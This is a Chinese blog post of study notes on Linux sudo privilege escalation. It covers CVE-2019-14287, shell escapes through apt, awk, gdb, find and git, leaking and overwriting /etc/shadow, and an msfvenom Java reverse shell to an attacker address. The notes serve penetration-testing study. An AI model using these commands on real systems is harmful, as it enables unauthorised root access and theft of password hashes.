首页 > 其他分享 >sudo风暴

sudo风暴

时间:2024-05-23 19:08:05浏览次数:21  
标签:bin shell sudo 哈希 shadow 风暴 bash

sudo风暴

sudo -l 进行枚举,寻找相符合条件进行提权

欢迎关注微信公众号交流

qrcode_for_gh_e5fc05804a3e_430

CVE-2019-14287

sudo -u jack /bin/bash

sudo -u#1000 /bin/bash #另一种方式

sudo -u#-1 /bin/bash #-1会被sudo算法解释成0

利用条件:sudo版本1.8.28之前

image-20240523163643430

sudo apt

sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash

  • -o指定APT选项
  • 冒号类似于名字空间,逐级访问子配置
  • 最终执行的是启动bash会话

image-20240523164129735

sudo apache2

sudo apache2 -f /etc/shadow
  • 执行时因为给定的配置文件是错误的,那么报错会显示root哈希值

image-20240523170222956

  • -f是对敏感文件进行泄露

image-20240523170200690

  • 如果用户名后有\(y\),则表明密码已使用yescrypt进行哈希处理
  • 使用format参数指定crypt

image-20240523170313346

sudo ash

image-20240523170607519

  • 新启一个bash会话获得新的交互性

  • ash本身就是一个shell

sudo awk

sudo awk 'BEGIN {system("/bin/bash")}'
  • 单引号内容为传递给awk的一个脚本
  • BEGIN 是awk的一个特殊模式,表示在处理任何输入之前执行的动作,而我们让他执行的动作是系统命令启动bin/bash的shell环境

image-20240523171116777

sudo base64

image-20240523171423611

声明一个变量

因为sudo有base64权限,我们先把声明变量进行编码然再进行解码,但是它看到的却是用sudo base64权限来完成的。这样我们就获得了敏感信息

image-20240523171823642

john破解

image-20240523172144907

base32、58、nc 等都可以同样方法

sudo bash

image-20240523172308250

  • 其他shell环境(本身就是shell):csh\dash\sh\tclsh\zsh

sudo cp

  • mkpasswd生成明文密码哈希
  • -m指定加密方法
  • 一般shadow为sha-512哈希加密

image-20240523172629186

将root哈希替换成刚刚生成的哈希

image-20240523172848937

声明一个环境变量RedteamNotes指向/etc/shadow

再声明一个TF=$(mktemp)指向是mktemp生成的临时文件

将生成的shadow记录写到TF变量之中

image-20240523173513149

image-20240523173741233

sudo cpulimit

sudo cpulimit -l 100 -f /bin/bash

-l 指定使用率100%

-f 指定程序按照-l参数去使用cpu比例

sudo curl

前期环境创造与sudo cp 相同

攻击机做一个sudo php的简易web服务器

image-20240523174739130

靶机执行

sudo curl http://192.168.218.145/shadow_entry -o /etc/shadow

-o 输出

sudo date

会泄露出敏感信息

image-20240523175114034

进行哈希值破解

sudo ed

sudo /usr/bin/ed
!/bin/bash

!执行系统命令

  • 2>/dev/null 扔掉垃圾信息

sudo env

env设置和显示变量的值

image-20240523180153631

sudo expect

image-20240523180742175

sudo find

image-20240523181600570

分号必须被转义,本身命令行的分隔符,不加反斜杠shell会将分号解释为命令分隔符,会导致exec没有结束,引发错误

sudo flock

协调多个进程对多个进程的访问

image-20240523182204299

sudo ftp

image-20240523182257672

sudo gcc

包装器-wrapper

,-s bash参数指定从标准输入读取命令,使bash在读取到eof时不会退出,

. gcc要编译内容

image-20240523182647676

sudo gdb

sudo gdb -nx -ex '!bash' -ex quit

image-20240523183614961

sudo git

sudo git branch --help

image-20240523183820179

image-20240523183759571

sudo gzip/gunzip

-t 检查压缩文件(试着去读取)

shadow时纯文本文件,在读取时会把信息显露出来

-f force 强制执行

sudo gzip -f /etc/shadow -t

sudo hping3

image-20240523184310288

sudo iftop

/bin/bash

sudo java

sudo msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f jar -o shell.jar

生成反弹shell

10.10.10.10为攻击机地址

开启简易服务器传递shell文件

sudo php -S 0:80

靶机进行下载wget

运行jar文件:java -jar shell.jar

攻击机监听4444端口

接受反弹

后续继续学习

「红队笔记」Linux提权精讲:Sudo风暴 - Sudo风暴全70讲,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili

53分钟

标签:bin,shell,sudo,哈希,shadow,风暴,bash
From: https://www.cnblogs.com/guangen/p/18209174

相关文章

  • Linux 提权-Sudo_2
    本文通过Google翻译SudoPart-2–LinuxPrivelegeEscalation-Juggernaut-Sec这篇文章所产生,本人仅是对机器翻译中部分表达不准确的字词进行了校正及个别注释补充。导航0前言1第1部分快速回顾2利用Sudo命令–滥用预期功能2.1使用Hashcat破解Shadow......
  • Linux 提权-Sudo_1
    本文通过Google翻译SudoPart-1–LinuxPrivilegeEscalation-Juggernaut-Sec这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。导航1什么是Sudo以及它是如何工作?1.1Sudo二进制、权限和组解释2手动寻找Sudo权限2.1......
  • su和sudo不需要输入密码
    Linux中使普通用户使用Sudo不需要输入密码[root@hcss-ecs-c16f~]#useraddlzj[root@hcss-ecs-c16f~]#echo1234|passwd--stdinlzj更改用户lzj的密码。passwd:所有的身份验证令牌已经成功更新。[root@hcss-ecs-c16f~]#vim/etc/sudoerslzjALL=(ALL)NOPASS......
  • DC-9-sudo提权
    标签:SQL注入、本地文件包含LFI、端口敲门、hydra爆破、linux提权0x00环境准备下载地址:https://www.vulnhub.com/entry/dc-9,412/靶机描述:DC-9isanotherpurposelybuiltvulnerablelabwiththeintentofgainingexperienceintheworldofpenetrationtesting.The......
  • Linux 下以其他用户身份运行程序—— su、sudo、runuser
    转自:https://blog.csdn.net/u011250186/article/details/106335028/本文综合分析了Linux系统下,如何使用runuser命令、su命令和sudo命令以其他用户身份来运行程序,以及这三个命令的运行效率比较。 一、su命令临时切换用户身份SU:(Switchuser切换用户),可让一个普通用户切换为......
  • sudo: apt-get: command not found
    sudo:apt-get:commandnotfoundhttps://blog.csdn.net/zhengzhaoyang122/article/details/136132952问题LinuxRedHat执行sudo卸载nginx时,出现commandnotfound错误[root@iZuf65h6i43ltlzhqolumyZlocal]#sudoapt-getremovenginxsudo:apt-get:commandnotfound12解......
  • 为 mac 终端 sudo 命令启用 Touch ID
    mac终端每次使用sudo命令时都需要输入密码,非常麻烦。记录下如何为终端的sudo命令启用TouchID。详细步骤:进入系统存储PAM列表的目录:cd/etc/pam.d编辑sudo文件,需要使用sudo命令:sudovimsudo在第一行后添加如下配置:authsufficientpam_tid.so保存文件,这里需......
  • 名义小组、焦点小组、引导式研讨会、头脑风暴
    【名义小组】:名义小组技术通过投票来排列最有用的创意,以便进行进一步的头脑风暴或优先排序。首先,将全体参与者分成多个”名义”上的小组,由每个小组开展讨论。小组讨论结束后,主持人依次向每位参与者询问,请每人提出一个创意。这种询问可以进行很多轮,直至得到足够数量的创意。最后,请......
  • 第十一届蓝桥杯C/C++组C组决赛之思维风暴 快速解题
    十五届蓝桥杯即将开赛,十一届的蓝桥杯国赛的一些巧妙解法。美丽的2 题目描述本题为填空题,只需要算出结果后,在代码中使用输出语包将所填结果输出即可。小蓝特别喜欢2,今年是公元2020年,他特别高兴。他很好奇,在公元1年到公元2020年(包含)中,有多少个年份的数位中包含数字2?......
  • Linux下 sudo 和 su 的区别
    su介绍及使用su命令就是切换用户的工具,比如我们是以普通用户guest登录的,但要添加用户,执行useradd,guest用户没有这个权限,只有root有权限。解决办法有两个,一是退出guest用户,重新以root用户登录;二是不退出guest用户,使用su来切换到root下进行添加用户的操作,操作完......